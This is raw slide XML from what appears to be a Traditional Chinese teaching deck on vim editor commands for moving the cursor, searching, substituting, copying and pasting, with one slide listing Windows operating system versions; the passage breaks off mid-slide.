          </a:p>
          <a:p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儲存檔案、離開 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>vim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337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移動</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6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0820510"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="539552" y="1412776"/>
          <a:ext cx="8229600" cy="4637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5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2852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指令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功能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h</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>或←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游標向左移動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j</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>或 ↓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游標向下移動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k</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>或 ↑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游標向上移動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L</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>或→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游標向右移動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2852">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>如果想向下移動</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>行，可以使用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>5j</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>或</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>↓。</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p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132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移動</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7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8835850"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467544" y="1412776"/>
          <a:ext cx="8229600" cy="4637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5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2852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指令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功能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[Ctrl]+[f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螢幕向下移動一頁，同</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>[Page Down]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[Ctrl]+[b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螢幕向上移動一頁，同</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>[Page up]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[Ctrl]+[d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螢幕向下移動半頁，同</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>[Page Down](</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>少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[Ctrl]+[u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螢幕向上移動半頁，同</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>[Page Down](</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>少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2852">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91439" marR="91439"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p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8003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移動</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5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517005"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467544" y="1412776"/>
          <a:ext cx="8229600" cy="4637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5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2852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指令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功能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0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>或</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>[Home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到這一行的最前面字元處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$</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>或</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>[End]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到這一行的最後面字元處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>
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>H</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>igh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動到螢幕最上方的那一行的第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r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>iddle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動到螢幕中間的那一行的第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>
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>L</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ow</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="26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動到螢幕最下方的那一行的第一個字元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001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移動</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6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380056"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467544" y="1412776"/>
          <a:ext cx="8229600" cy="4637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5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2852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指令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功能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G</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="26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動到這個檔案的最後一行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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>nG</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="26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N</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>為數字，移動到這個檔案的第</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>n</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>行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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>gg</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="26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同</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>1G</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>，移動到這個檔案的第一行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>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>n&lt;Enter&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="26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n</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>為數字，游標向下移動</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>n</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>行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2852">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600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endParaRPr lang="zh-TW" altLang="en-US" sz="26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移動一個字</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="26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筆跡 1"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="421560" y="4793400"/>
              <a:ext cx="6708240" cy="28800"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="筆跡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05720" y="4730040"/>
                <a:ext cx="6739920" cy="15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6635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移動游標的進階操作</a:t>
            </a:r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5584061"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1481138"/>
          <a:ext cx="8229600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600" dirty="0" smtClean="0"/>
                        <a:t>按鍵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/>
                        <a:t>說明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600" dirty="0" smtClean="0"/>
                        <a:t>E</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>e 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600" dirty="0" smtClean="0"/>
                        <a:t>e </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>或 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>E</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>：將游標移到本單字的最後一個字元；如果游標所在位置為本單字的最後一個字元</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>則跳到下一個單字的最後一個字元。</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l"/>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>若輸入小寫 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>"e" ,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>則標點符號如 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>"."</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>、</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>"," </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>或 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>"/" </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>等字元都會被當成另一個字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600" dirty="0" smtClean="0"/>
                        <a:t>b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600" dirty="0" smtClean="0"/>
                        <a:t>將游標移到本單字的第一個字元；如果游標所在位置為本單字的第一個字元 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>則跳到上一個單字的第一個字元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0485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TW" altLang="en-US" dirty="0"/>
              <a:t>搜尋與取代</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7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1001730"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1268760"/>
          <a:ext cx="8229600" cy="5577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95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按鍵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400" dirty="0" smtClean="0"/>
                        <a:t>說明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word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向游標之下尋找一個名稱為 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>word </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>的字串。例如要在檔案內搜尋 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這個字串，就輸入 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>/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即可！ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>常用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?word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向游標之上尋找一個字串名稱為 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>word </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>的字串。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n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這個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是英文按鍵。代表</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>『</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>重複前一個搜尋的動作</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>』</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>。舉例來說， 如果剛剛我們執行 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>/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去向下搜尋 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這個字串，則按下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後，會向下繼續搜尋下一個名稱為 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的字串。如果是執行 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>?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的話，那麼按下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則會向上繼續搜尋名稱為 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的字串！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N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這個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是英文按鍵。與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剛好相反，為</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>『</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>反向</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>』</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>進行前一個搜尋動作。 例如 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>/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en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>後，按下 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>N </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>則表示</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>『</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>向上</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>』</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>搜尋 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
                        <a:t>vbird</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
                        <a:t>。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331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搜尋與取代</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="7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7609357"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1481138"/>
          <a:ext cx="822960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427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6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700" dirty="0" smtClean="0"/>
                        <a:t>按鍵</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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700" dirty="0" smtClean="0"/>
                        <a:t>說明</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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700" dirty="0" smtClean="0"/>
                        <a:t>:1,$s/word1/word2/g</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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700" dirty="0" smtClean="0"/>
                        <a:t>從第一列到最後一列尋找 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" smtClean="0"/>
                        <a:t>word1 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
                        <a:t>字串，並將該字串取代為 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" smtClean="0"/>
                        <a:t>word2 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
                        <a:t>！</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" smtClean="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
                        <a:t>常用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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700" dirty="0" smtClean="0"/>
                        <a:t>:1,$s/word1/word2/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" err="1" smtClean="0"/>
                        <a:t>gc</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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700" dirty="0" smtClean="0"/>
                        <a:t>從第一列到最後一列尋找 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" smtClean="0"/>
                        <a:t>word1 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
                        <a:t>字串，並將該字串取代為 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" smtClean="0"/>
                        <a:t>word2 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
                        <a:t>！且在取代前顯示提示字元給使用者確認 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" smtClean="0"/>
                        <a:t>(confirm) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
                        <a:t>是否需要取代！</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" smtClean="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2700" dirty="0" smtClean="0"/>
                        <a:t>常用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2700" dirty="0" smtClean="0"/>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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7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022000" y="699840"/>
              <a:ext cx="1128960" cy="291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06160" y="636480"/>
                <a:ext cx="11610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筆跡 4"/>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="1371600" y="2321640"/>
              <a:ext cx="800280" cy="3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55760" y="2258280"/>
                <a:ext cx="8323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2471760" y="2293200"/>
              <a:ext cx="900360" cy="288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55920" y="2229480"/>
                <a:ext cx="932040" cy="15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6417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Windows</a:t>
            </a:r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作業系統介紹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49982"/>
            <a:ext cx="8229600" cy="4859338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>個人電腦作業系統：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows 95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98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ME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0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>professionl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XP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Vista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7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 、 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows 8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TW" dirty="0"/>
              <a:t> Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。 </a:t>
            </a:r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zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>伺服器作業系統：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows NT4.0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0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Windows 2003 Windows 2008 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Windows 2012 server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>2016 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean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761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4013401"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1481138"/>
          <a:ext cx="82296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按鍵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/>
                        <a:t>說明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err="1" smtClean="0"/>
                        <a:t>yy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複製游標所在的那一列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err="1" smtClean="0"/>
                        <a:t>nyy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n </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>為數字。複製游標所在的向下 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>n </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>列，例如 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>20yy </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>則是複製 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>20 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2600" dirty="0" smtClean="0"/>
                        <a:t>列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y1G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複製游標所在列到第一列的所有資料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err="1" smtClean="0"/>
                        <a:t>yG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複製游標所在列到最後一列的所有資料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y0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複製游標所在的那個字元到該列行首的所有資料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y$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複製游標所在的那個字元到該列行尾的所有資料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複製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07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6793488"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1481138"/>
          <a:ext cx="82296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p, P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p </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>為將已複製的資料在游標下一列貼上，</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>P </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>則為貼在游標上一列！ 舉例來說，我目前游標在第 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" smtClean="0"/>
                        <a:t>20 </a:t>
